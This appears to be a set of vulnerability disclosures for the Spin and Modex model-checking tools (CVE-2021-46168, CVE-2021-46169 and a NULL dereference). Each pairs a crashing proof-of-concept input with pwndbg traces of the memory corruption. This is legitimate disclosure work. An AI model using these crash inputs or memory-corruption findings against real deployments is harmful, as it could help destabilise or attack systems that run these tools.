Spin v6.5.1 was discovered to contain an out-of-bounds write in lex() at spinlex.c.

**Out-of-bounds Write in lex()****Description**

Out-of-bounds Write in lex() at spinlex.c:1707

If there are 129 `{`，the `yyin` will add 1

int	scope\_seq\[128\], scope\_level = 0;
//...
case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;

then, the `fclose(yyin)` at main:1162 will crash.

If there are more `}` than `{`, the `scope_level` will be negative.

    case '}': scope_level--; set_cur_scope(); break;
    

then, the variables before `scope_seq` will add 1.

Should there be a limit?

**version**

045a0a5

    ./spin -V
    Spin Version 6.5.1 -- 3 June 2021
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{

**command**

**Result**

    spin ./poc.pml
    spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'
    [1]    3640076 segmentation fault  ./spin ./poc.pml
    

**gdb**

pwndbg> c
Continuing.
\[Detaching after vfork from child process 3024771\]

Hardware watchpoint 2: yyin

Old value = (FILE \*) 0x7ffff7fab980 <\_IO\_2\_1\_stdin\_>
New value = (FILE \*) 0x5555556d32a0
0x00005555555ce524 in main (argc=2, argv=0x7fffffffe188) at main.c:1106
1106                    if (!(yyin = fopen(out1, "r")))
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
\*RAX  0x5555556d32a0 ◂— 0xfbad2488
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x1e
\*RDX  0x0
\*RDI  0x555555618c9e ◂— 0x63203a6e69707300
\*RSI  0x2c
\*R8   0x8
\*R9   0x1
\*R10  0x0
\*R11  0x246
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe090 ◂— 0x0
 RSP  0x7fffffffdc30 —▸ 0x7fffffffe188 —▸ 0x7fffffffe47d ◂— '/home/aidai/fuzzing/model\_checking/Spin-test/Src/spin'
\*RIP  0x5555555ce524 (main+3399) ◂— mov    rax, qword ptr \[rip + 0xfd135\]
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555ce524 <main+3399>    mov    rax, qword ptr \[rip + 0xfd135\] <0x5555556cb660>
   0x5555555ce52b <main+3406>    test   rax, rax
   0x5555555ce52e <main+3409>    jne    main+3445                <main+3445>
    ↓
   0x5555555ce552 <main+3445>    mov    rax, qword ptr \[rbp - 0x460\]
   0x5555555ce559 <main+3452>    add    rax, 8
   0x5555555ce55d <main+3456>    mov    rax, qword ptr \[rax\]
   0x5555555ce560 <main+3459>    mov    rdi, rax
   0x5555555ce563 <main+3462>    call   strlen@plt                <strlen@plt>

   0x5555555ce568 <main+3467>    add    rax, 1
   0x5555555ce56c <main+3471>    cmp    rax, 0x1ff
   0x5555555ce572 <main+3477>    jbe    main+3510                <main+3510>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/main.c
   1101
   1102                 if (preprocessonly)
   1103                 {       alldone(0);
   1104                 }
   1105
 ► 1106                 if (!(yyin = fopen(out1, "r")))
   1107                 {       printf("spin: cannot open %s\\n", out1);
   1108                         alldone(1);
   1109                 }
   1110
   1111                 assert(strlen(argv\[1\])+1 < sizeof(cmd));
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc30 —▸ 0x7fffffffe188 —▸ 0x7fffffffe47d ◂— '/home/aidai/fuzzing/model\_checking/Spin-test/Src/spin'
01:0008│     0x7fffffffdc38 ◂— 0x2f7fdb1e9
02:0010│     0x7fffffffdc40 ◂— 0x1
03:0018│     0x7fffffffdc48 ◂— 0x61d1ad40f7fb2a08
04:0020│     0x7fffffffdc50 ◂— 0x0
05:0028│     0x7fffffffdc58 ◂— 0x0
06:0030│     0x7fffffffdc60 —▸ 0x7ffff7fac6a0 (\_IO\_2\_1\_stdout\_) ◂— 0xfbad2084
07:0038│     0x7fffffffdc68 —▸ 0x7ffff7ffd9e8 (\_rtld\_global+2440) —▸ 0x7ffff7fcf000 ◂— 0x10102464c457f
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555ce524 main+3399
   f 1   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p yyin
$9 = (FILE \*) 0x5555556d32a0
pwndbg> c
Continuing.
spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'

Hardware watchpoint 2: yyin

Old value = (FILE \*) 0x5555556d32a0
New value = (FILE \*) 0x5555556d32a1
lex () at spinlex.c:1707
1707            case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
\*RAX  0x5555556cb460 (scope\_seq) ◂— 0x100000001
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x556d32a1
\*RDX  0x200
\*RDI  0x7b
\*RSI  0x6e
\*R8   0x7b
\*R9   0x3
\*R10  0x555555619116 ◂— 0x5c00745c00625c00
\*R11  0x7ffff7fabbe0 (main\_arena+96) —▸ 0x5555556d7aa0 ◂— 0x0
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
\*RBP  0x7fffffffd300 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— 0x0
\*RSP  0x7fffffffd140 ◂— 0x3000000018
\*RIP  0x5555555c6b08 (lex+3177) ◂— call   0x5555555c5954
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555c6b08 <lex+3177\>    call   set\_cur\_scope                <set\_cur\_scope>

   0x5555555c6b0d <lex+3182\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b0f <lex+3184\>    mov    eax, dword ptr \[rip + 0xe13cf\] <0x5555556a7ee4\>
   0x5555555c6b15 <lex+3190\>    sub    eax, 1
   0x5555555c6b18 <lex+3193\>    mov    dword ptr \[rip + 0xe13c6\], eax <0x5555556a7ee4\>
   0x5555555c6b1e <lex+3199\>    call   set\_cur\_scope                <set\_cur\_scope>

   0x5555555c6b23 <lex+3204\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b25 <lex+3206\>    nop
   0x5555555c6b26 <lex+3207\>    jmp    lex+3213                <lex+3213\>

   0x5555555c6b28 <lex+3209\>    nop
   0x5555555c6b29 <lex+3210\>    jmp    lex+3213                <lex+3213\>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/spinlex.c
   1702         case '?': c = follow('?', R\_RCV, RCV); break;
   1703         case '&': c = follow('&', AND, '&'); break;
   1704         case '|': c = follow('|', OR, '|'); break;
   1705         case ';': c = SEMI; break;
   1706         case '.': c = follow('.', DOTDOT, '.'); break;
 ► 1707         case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
   1708         case '}': scope\_level--; set\_cur\_scope(); break;
   1709         default : break;
   1710         }
   1711         ValToken(0, c)
   1712 }
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 ◂— 0x3000000018
01:0008│     0x7fffffffd148 ◂— 0x7bffffd220
02:0010│     0x7fffffffd150 —▸ 0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 ◂— ...
03:0018│     0x7fffffffd158 ◂— 0x3f55a706937ce400
04:0020│     0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— ...
05:0028│     0x7fffffffd168 —▸ 0x7ffff7e24ebf (printf+175) ◂— mov    rcx, qword ptr \[rsp + 0x18\]
06:0030│     0x7fffffffd170 ◂— 0x7b /\* '{' \*/
07:0038│     0x7fffffffd178 ◂— 0x0
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555c6b08 lex+3177
   f 1   0x5555555c7235 yylex+61
   f 2   0x5555555bca8d yyparse+796
   f 3   0x5555555ce8d8 main+4347
   f 4   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> x/70gx scope\_seq
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000100000001
0x5555556cb470 <scope\_seq+16\>:  0x0000000100000001      0x0000000100000001
0x5555556cb480 <scope\_seq+32\>:  0x0000000100000001      0x0000000100000001
0x5555556cb490 <scope\_seq+48\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4a0 <scope\_seq+64\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4b0 <scope\_seq+80\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4c0 <scope\_seq+96\>:  0x0000000100000001      0x0000000100000001
0x5555556cb4d0 <scope\_seq+112\>: 0x0000000100000001      0x0000000100000001
0x5555556cb4e0 <scope\_seq+128\>: 0x0000000100000001      0x0000000100000001
0x5555556cb4f0 <scope\_seq+144\>: 0x0000000100000001      0x0000000100000001
0x5555556cb500 <scope\_seq+160\>: 0x0000000100000001      0x0000000100000001
0x5555556cb510 <scope\_seq+176\>: 0x0000000100000001      0x0000000100000001
0x5555556cb520 <scope\_seq+192\>: 0x0000000100000001      0x0000000100000001
0x5555556cb530 <scope\_seq+208\>: 0x0000000100000001      0x0000000100000001
0x5555556cb540 <scope\_seq+224\>: 0x0000000100000001      0x0000000100000001
0x5555556cb550 <scope\_seq+240\>: 0x0000000100000001      0x0000000100000001
0x5555556cb560 <scope\_seq+256\>: 0x0000000100000001      0x0000000100000001
0x5555556cb570 <scope\_seq+272\>: 0x0000000100000001      0x0000000100000001
0x5555556cb580 <scope\_seq+288\>: 0x0000000100000001      0x0000000100000001
0x5555556cb590 <scope\_seq+304\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5a0 <scope\_seq+320\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5b0 <scope\_seq+336\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5c0 <scope\_seq+352\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5d0 <scope\_seq+368\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5e0 <scope\_seq+384\>: 0x0000000100000001      0x0000000100000001
0x5555556cb5f0 <scope\_seq+400\>: 0x0000000100000001      0x0000000100000001
0x5555556cb600 <scope\_seq+416\>: 0x0000000100000001      0x0000000100000001
0x5555556cb610 <scope\_seq+432\>: 0x0000000100000001      0x0000000100000001
0x5555556cb620 <scope\_seq+448\>: 0x0000000100000001      0x0000000100000001
0x5555556cb630 <scope\_seq+464\>: 0x0000000100000001      0x0000000100000001
0x5555556cb640 <scope\_seq+480\>: 0x0000000100000001      0x0000000100000001
0x5555556cb650 <scope\_seq+496\>: 0x0000000100000001      0x0000000100000001
0x5555556cb660 <yyin>:  0x00005555556d32a1      0x0000000000000000
0x5555556cb670: 0x0000000000000000      0x0000000000000000
0x5555556cb680 <yytext>:        0x6d702e636f70007b      0x64003e656e69006c

**poc**

**command**

**Result**

    ./model_checking/Spin/Src/spin ./poc.pml
    spin: ./poc.pml:1, Error: syntax error  saw ''{' = 123'
    0 processes created
    

**gdb**

pwndbg> c
Continuing.

Breakpoint 4, lex () at spinlex.c:1707
1707            case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────
 RAX  0x5555555c6acd (lex+3118) ◂— mov    eax, dword ptr \[rip + 0xe1411\]
 RBX  0x5555556111f0 (\_\_libc\_csu\_init) ◂— endbr64
\*RCX  0x5555556d5520 ◂— 0x0
 RDX  0x555555616628 ◂— 0xfffb04fdfffb03f0
 RDI  0x7b
\*RSI  0x6e
 R8   0x7b
 R9   0x3
 R10  0x555555619116 ◂— 0x5c00745c00625c00
 R11  0x7ffff7fabbe0 (main\_arena+96) —▸ 0x5555556d5520 ◂— 0x0
 R12  0x5555555bc660 (\_start) ◂— endbr64
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x7fffffffd300 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— 0x0
 RSP  0x7fffffffd140 ◂— 0x3000000018
 RIP  0x5555555c6acd (lex+3118) ◂— mov    eax, dword ptr \[rip + 0xe1411\]
──────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────
 ► 0x5555555c6acd <lex+3118\>    mov    eax, dword ptr \[rip + 0xe1411\] <0x5555556a7ee4\>
   0x5555555c6ad3 <lex+3124\>    lea    edx, \[rax + 1\]
   0x5555555c6ad6 <lex+3127\>    mov    dword ptr \[rip + 0xe1408\], edx <0x5555556a7ee4\>
   0x5555555c6adc <lex+3133\>    movsxd rdx, eax
   0x5555555c6adf <lex+3136\>    lea    rcx, \[rdx\*4\]
   0x5555555c6ae7 <lex+3144\>    lea    rdx, \[rip + 0x104972\]         <0x5555556cb460\>
   0x5555555c6aee <lex+3151\>    mov    edx, dword ptr \[rcx + rdx\]
   0x5555555c6af1 <lex+3154\>    lea    ecx, \[rdx + 1\]
   0x5555555c6af4 <lex+3157\>    cdqe
   0x5555555c6af6 <lex+3159\>    lea    rdx, \[rax\*4\]
   0x5555555c6afe <lex+3167\>    lea    rax, \[rip + 0x10495b\]         <0x5555556cb460\>
──────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────
In file: /home/aidai/fuzzing/model\_checking/Spin-test/Src/spinlex.c
   1702         case '?': c = follow('?', R\_RCV, RCV); break;
   1703         case '&': c = follow('&', AND, '&'); break;
   1704         case '|': c = follow('|', OR, '|'); break;
   1705         case ';': c = SEMI; break;
   1706         case '.': c = follow('.', DOTDOT, '.'); break;
 ► 1707         case '{': scope\_seq\[scope\_level++\]++; set\_cur\_scope(); break;
   1708         case '}': scope\_level--; set\_cur\_scope(); break;
   1709         default : break;
   1710         }
   1711         ValToken(0, c)
   1712 }
──────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd140 ◂— 0x3000000018
01:0008│     0x7fffffffd148 ◂— 0x7bffffd220
02:0010│     0x7fffffffd150 —▸ 0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 ◂— ...
03:0018│     0x7fffffffd158 ◂— 0x6e01a8e24c007700
04:0020│     0x7fffffffd160 —▸ 0x7fffffffd260 —▸ 0x7fffffffd330 —▸ 0x7fffffffdc20 —▸ 0x7fffffffe090 ◂— ...
05:0028│     0x7fffffffd168 —▸ 0x7ffff7e24ebf (printf+175) ◂— mov    rcx, qword ptr \[rsp + 0x18\]
06:0030│     0x7fffffffd170 ◂— 0x7b /\* '{' \*/
07:0038│     0x7fffffffd178 ◂— 0x0
────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────
 ► f 0   0x5555555c6acd lex+3118
   f 1   0x5555555c7235 yylex+61
   f 2   0x5555555bca8d yyparse+796
   f 3   0x5555555ce8d8 main+4347
   f 4   0x7ffff7de70b3 \_\_libc\_start\_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p scope\_level
$15 = -2
pwndbg> x/10gx scope\_seq
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000000000000
0x5555556cb470 <scope\_seq+16\>:  0x0000000000000000      0x0000000000000000
0x5555556cb480 <scope\_seq+32\>:  0x0000000000000000      0x0000000000000000
0x5555556cb490 <scope\_seq+48\>:  0x0000000000000000      0x0000000000000000
0x5555556cb4a0 <scope\_seq+64\>:  0x0000000000000000      0x0000000000000000
pwndbg> x/10gx scope\_seq-0x10
0x5555556cb420 <can>:   0x0000000000000000      0x0000000000000000
0x5555556cb430 <Caches>:        0x0000000000000000      0x0000000000000000
0x5555556cb440 <yynerrs>:       0xfffffffe00000001      0x00005555556d54e0
0x5555556cb450: 0x0000000100000000      0x0000000000000000
0x5555556cb460 <scope\_seq>:     0x0000000100000001      0x0000000000000000
pwndbg>

CVE-2021-46168: Out-of-bounds Write in lex() · Issue #56 · nimble-code/Spin

Modex v2.11 was discovered to contain an Use-After-Free vulnerability via the component tcache.

**Use After Free****Description**

I am learning model checking. But I run a fuzzer for fun today.

My fuzzer has found a Use After Free in modex.

The chunk 0x5555555b96b0 was freed.Then the tcache key was covered and the chunk was freed again.

**version**

acfa291

    modex -V
    MODEX Version 2.11 - 3 November 2017
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

base64 poc
dHlwZWRlZiBzdHJ1Y3QgRW50cnkgRW50cnk7CgpzdHJ1Y3QgRW50cnkgewp9CglFbnRyeSBoZWFk
OwoJZm9yICh2YWwgPSAwOyB2YWwgPCAycmV0dXJuOyB2YWwrKyl9Cgp2b2lkICoKcnRsX2dldCh2
b2lkICphcmcpCnsJNG50cnkgKnE7CgkJbmV4dCA9IHEtPm5leHQ7CmlmIDsxPT0wKQoJCWUgPSBu
ZXh0LT5uZXh0O3ggPSBjewoJCW5leHQgPSBxLT5uZXh0OwoJCWlmICgoeCA9PSAwKTsKCglpZiAo
cS0+bmV4dGVtcCBuaWwgJiYgZSA9PSAwKQoJewl4ID0gY2FzKCZxLT50YWlsLCBuZXh0LCBxKTsK
CQlpZih4ID09IDApCgkJewljYXMoJm5leHQtPm5leHQsIG5pbCwgbmV4dC0+dMptcCk7CgkJCS0+
bmV4YXNzZXJ0KG5leHQ8PnZhbHVlID2AAAAAIHZhbDEgKyAxIHx8IG5leHQtPnZhbHVlID09IHZh
bDIgKyAxcnkgaGVhZDsKRW50cnkgKm5pbCA9O3ByZXYtPnRlbXAgPSBuZXc7CgkJZGVjdmFsMSAr
IDEpCgkJdmFsMSsrOwp9CgppbnQKbWFpbih2b2lkKQp9CglyZXR1cm4gMDsKfQo=

**command**

**Result**

    modex poc.c
    MODEX Version 2.11 - 3 November 2017
    poc.c:4: Error (syntax error, unexpected RBRACE) before '}'
    }
    ^
    poc.c:6: Error (syntax error, unexpected FOR) before 'for'
     for (val = 0; val < 2return; val++)}
     ^
    poc.c:10: Error (syntax error, unexpected IDENT, expecting SEMICOLON) before 'Identifier'
    { 4ntry *q;
       ^
    poc.c:12: Error (syntax error, unexpected SEMICOLON, expecting LPAREN) before ';'
    if ;1==0)
       ^
    poc.c:12: Error (syntax error, unexpected RPAREN, expecting SEMICOLON) before ')'
    if ;1==0)
            ^
    poc.c:13: Error (syntax error, unexpected LBRACE, expecting SEMICOLON) before '{'
      e = next->next;x = c{
                          ^
    poc.c:15: Error (syntax error, unexpected SEMICOLON, expecting RPAREN) before ';'
      if ((x == 0);
                  ^
    poc.c:17: Error (syntax error, unexpected IDENT, expecting RPAREN) before 'Identifier'
     if (q->nextemp nil && e == 0)
                    ^
    poc.c:20: Error (syntax error, unexpected RPAREN, expecting SEMICOLON) before ')'
      decval1 + 1)
                 ^
    poc.c:26: Error (syntax error, unexpected RBRACE, expecting LBRACE) before '}'
    }
    ^
    too many errors (10 detected)
    10 errors
    free(): double free detected in tcache 2
    [1]    3645907 abort      modex poc.c
    

**gdb**

`watch *0x5555555b96b0`

`c 34`

`n`

pwndbg>
0x00007ffff7cf603e      863     in libioP.h
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────
 RAX  0xffffff00
 RBX  0x7ffff7e5e4a0 (\_IO\_file\_jumps) ◂— 0x0
 RCX  0xffffffffffffffb0
 RDX  0x1c500
\*RDI  0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
 RSI  0x0
 R8   0x8000
 R9   0xa
 R10  0x5555555988f6 ◂— ' errors\\n'
 R11  0x246
 R12  0xffffffff
 R13  0x7fffffffe180 ◂— 0x2
 R14  0x0
 R15  0x0
 RBP  0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
 RSP  0x7fffffffdc90 —▸ 0x55555558c130 (\_\_libc\_csu\_init) ◂— endbr64
\*RIP  0x7ffff7cf603e (fclose+238) ◂— call   0x7ffff7c96330
───────────────────────────────────────\[ DISASM \]────────────────────────────────────────
   0x7ffff7cf602e <fclose+222\>    or     dl, al
   0x7ffff7cf6030 <fclose+224\>    jne    fclose+243                <fclose+243\>

   0x7ffff7cf6032 <fclose+226\>    cmp    rbp, qword ptr \[rip + 0x165e57\]
   0x7ffff7cf6039 <fclose+233\>    je     fclose+243                <fclose+243\>

   0x7ffff7cf603b <fclose+235\>    mov    rdi, rbp
 ► 0x7ffff7cf603e <fclose+238\>    call   free@plt                <free@plt>
        ptr: 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0

   0x7ffff7cf6043 <fclose+243\>    mov    eax, r12d
   0x7ffff7cf6046 <fclose+246\>    pop    rbx
   0x7ffff7cf6047 <fclose+247\>    pop    rbp
   0x7ffff7cf6048 <fclose+248\>    pop    r12
   0x7ffff7cf604a <fclose+250\>    ret
────────────────────────────────────────\[ STACK \]────────────────────────────────────────
00:0000│ rsp 0x7fffffffdc90 —▸ 0x55555558c130 (\_\_libc\_csu\_init) ◂— endbr64
01:0008│     0x7fffffffdc98 —▸ 0x7fffffffdcc0 —▸ 0x7fffffffdf40 —▸ 0x7fffffffe090 ◂— 0x0
02:0010│     0x7fffffffdca0 —▸ 0x5555555585c0 (\_start) ◂— endbr64
03:0018│     0x7fffffffdca8 —▸ 0x55555555b17e (Fclose+69) ◂— nop
04:0020│     0x7fffffffdcb0 —▸ 0x555555573208 (top\_of\_stack+28) ◂— test   eax, eax
05:0028│     0x7fffffffdcb8 —▸ 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
06:0030│     0x7fffffffdcc0 —▸ 0x7fffffffdf40 —▸ 0x7fffffffe090 ◂— 0x0
07:0038│     0x7fffffffdcc8 —▸ 0x55555555f440 (process\_input+883) ◂— mov    qword ptr \[rbp - 0x260\], 0
──────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────
 ► f 0   0x7ffff7cf603e fclose+238
   f 1   0x7ffff7cf603e fclose+238
   f 2   0x55555555b17e Fclose+69
   f 3   0x55555555f440 process\_input+883
   f 4   0x55555555f780 main+624
   f 5   0x7ffff7c980b3 \_\_libc\_start\_main+243
─────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bin
tcachebins
0x1e0 \[  2\]: 0x5555555b96b0 —▸ 0x5555555ba020 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
0xe00: 0x5555555b98f0 —▸ 0x7ffff7e5d1f0 (main\_arena+1648) ◂— 0x5555555b98f0
pwndbg> x/10gx 0x5555555b96b0
0x5555555b96b0: 0x00005555555ba020      0x00005555555bba90
0x5555555b96c0: 0x00005555555bba90      0x00005555555bba90
0x5555555b96d0: 0x00005555555bba90      0x00005555555bba90
0x5555555b96e0: 0x00005555555bba90      0x0000000000000000
0x5555555b96f0: 0x0000000000000000      0x0000000000000000
pwndbg> bt
#0  0x00007ffff7cf603e in \_IO\_deallocate\_file (fp=0x5555555b96b0) at libioP.h:863
#1  \_IO\_new\_fclose (fp=0x5555555b96b0) at iofclose.c:74
#2  0x000055555555b17e in Fclose (fd=0x5555555b96b0) at modex.c:105
#3  0x000055555555f440 in process\_input (f=0x7ffff7b6d0a0 "./poc.c", phase2=0) at modex.c:1243
#4  0x000055555555f780 in main (argc=2, argv=0x7fffffffe188) at modex.c:1306
#5  0x00007ffff7c980b3 in \_\_libc\_start\_main (main=0x55555555f510 <main>, argc=2, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld\_fini=<optimized out>, stack\_end=0x7fffffffe178) at ../csu/libc-start.c:308
#6  0x00005555555585ee in \_start ()

CVE-2021-46169: Use After Free · Issue #10 · nimble-code/Modex

Modex v2.11 was discovered to contain a NULL pointer dereference in set_create_id() at xtract.c.

**NULL Pointer Dereference in set\_create\_id()****Description**

NULL Pointer Dereference in `set_create_id()` at xtract.c:3797.

If there is no `&` in the first argument of `pthread_t()`, `s` will be NULL and the next `strchr()` will crash.

void
set\_create\_id(void)	// from the 1st '&(' to the 1st '),' in OutBuf
{	char \*s, \*e;

	join\_id = 0;
	s = strchr(OutBuf, '&');
	e = strchr(s+1, ')');
	if (!e || e-s <= 1) { return; }

	join\_id = (char \*) e\_malloc((e-s) \* sizeof(char));
	strncpy(join\_id, s+2, (e-s)-1\-1);
}

 pthread\_create(&t, 0, thread, 0);
 ► 0x55555556aa76 <set\_create\_id+35\>    call   strchr@plt                <strchr@plt>
        s: 0x5555555a2080 (OutBuf) ◂— 'F: pthread\_create((&(Pp\_main->t)),0,Pp\_main->thread,0)'
        c: 0x26

pthread\_create(a, 0, thread, 0);
► 0x55555556aa76 <set\_create\_id+35\>    call   strchr@plt                <strchr@plt>
        s: 0x5555555a2080 (OutBuf) ◂— 'F: pthread\_create(Pp\_main->a,0,Pp\_main->thread,0)'
        c: 0x26

**version**

acfa291

    ./modex -V
    MODEX Version 2.11 - 3 November 2017
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

#include <stdio.h\>
#include <pthread.h\>
void \*thread(){
	puts("hello world");
}
int main(void)
{	pthread\_t t;
	pthread\_t\* a;
	a = &t;
	while(1) {
		pthread\_create(a, 0, thread, 0);
	}
}

**command**

**Result**

    ./modex ./poc.c
    MODEX Version 2.11 - 3 November 2017
    [1]    2056163 segmentation fault  ./modex ./poc.c
    

**gdb**

    pwndbg>
    0x000055555556aa8f      3797            e = strchr(s+1, ')');
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x1
     RBX  0x55555558c0f0 (__libc_csu_init) ◂— endbr64
     RCX  0x0
     RDX  0x0
    *RDI  0x1
     RSI  0x29
     R8   0x212
     R9   0x5555555a2080 (OutBuf) ◂— 'F: pthread_create(Pp_main->t,0,Pp_main->thread,0)'
     R10  0x1e
     R11  0x7fffffffb757 ◂— 0x4c16e0b189dd0030 /* '0' */
     R12  0x5555555585c0 (_start) ◂— endbr64
     R13  0x7fffffffe0f0 ◂— 0x2
     R14  0x0
     R15  0x0
     RBP  0x7fffffffbea0 —▸ 0x7fffffffbee0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 ◂— ...
     RSP  0x7fffffffbe90 ◂— 0x0
    *RIP  0x55555556aa8f (set_create_id+60) ◂— call   0x555555558410
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x55555556aa7b <set_create_id+40>    mov    qword ptr [rbp - 0x10], rax
       0x55555556aa7f <set_create_id+44>    mov    rax, qword ptr [rbp - 0x10]
       0x55555556aa83 <set_create_id+48>    add    rax, 1
       0x55555556aa87 <set_create_id+52>    mov    esi, 0x29
       0x55555556aa8c <set_create_id+57>    mov    rdi, rax
     ► 0x55555556aa8f <set_create_id+60>    call   strchr@plt                <strchr@plt>
            s: 0x1
            c: 0x29
    
       0x55555556aa94 <set_create_id+65>    mov    qword ptr [rbp - 8], rax
       0x55555556aa98 <set_create_id+69>    cmp    qword ptr [rbp - 8], 0
       0x55555556aa9d <set_create_id+74>    je     set_create_id+155                <set_create_id+155>
    
       0x55555556aa9f <set_create_id+76>    mov    rax, qword ptr [rbp - 8]
       0x55555556aaa3 <set_create_id+80>    sub    rax, qword ptr [rbp - 0x10]
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /home/aidai/fuzzing/model_checking/Modex-test/Src/xtract.c
       3792 set_create_id(void)     // from the 1st '&(' to the 1st '),' in OutBuf
       3793 {       char *s, *e;
       3794
       3795         join_id = 0;
       3796         s = strchr(OutBuf, '&');
     ► 3797         e = strchr(s+1, ')');
       3798         if (!e || e-s <= 1) { return; }
       3799
       3800         join_id = (char *) e_malloc((e-s) * sizeof(char));
       3801         strncpy(join_id, s+2, (e-s)-1-1);
       3802 }
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffffbe90 ◂— 0x0
    01:0008│     0x7fffffffbe98 ◂— 0x0
    02:0010│ rbp 0x7fffffffbea0 —▸ 0x7fffffffbee0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 ◂— ...
    03:0018│     0x7fffffffbea8 —▸ 0x55555556b0ce (handle_pthread_create+20) ◂— call   0x55555556aaf1
    04:0020│     0x7fffffffbeb0 ◂— 0x0
    05:0028│     0x7fffffffbeb8 ◂— 0x5558c0f0
    06:0030│     0x7fffffffbec0 —▸ 0x7fffffffc140 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc5d0 —▸ 0x7fffffffca40 ◂— ...
    07:0038│     0x7fffffffbec8 —▸ 0x5555555585c0 (_start) ◂— endbr64
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
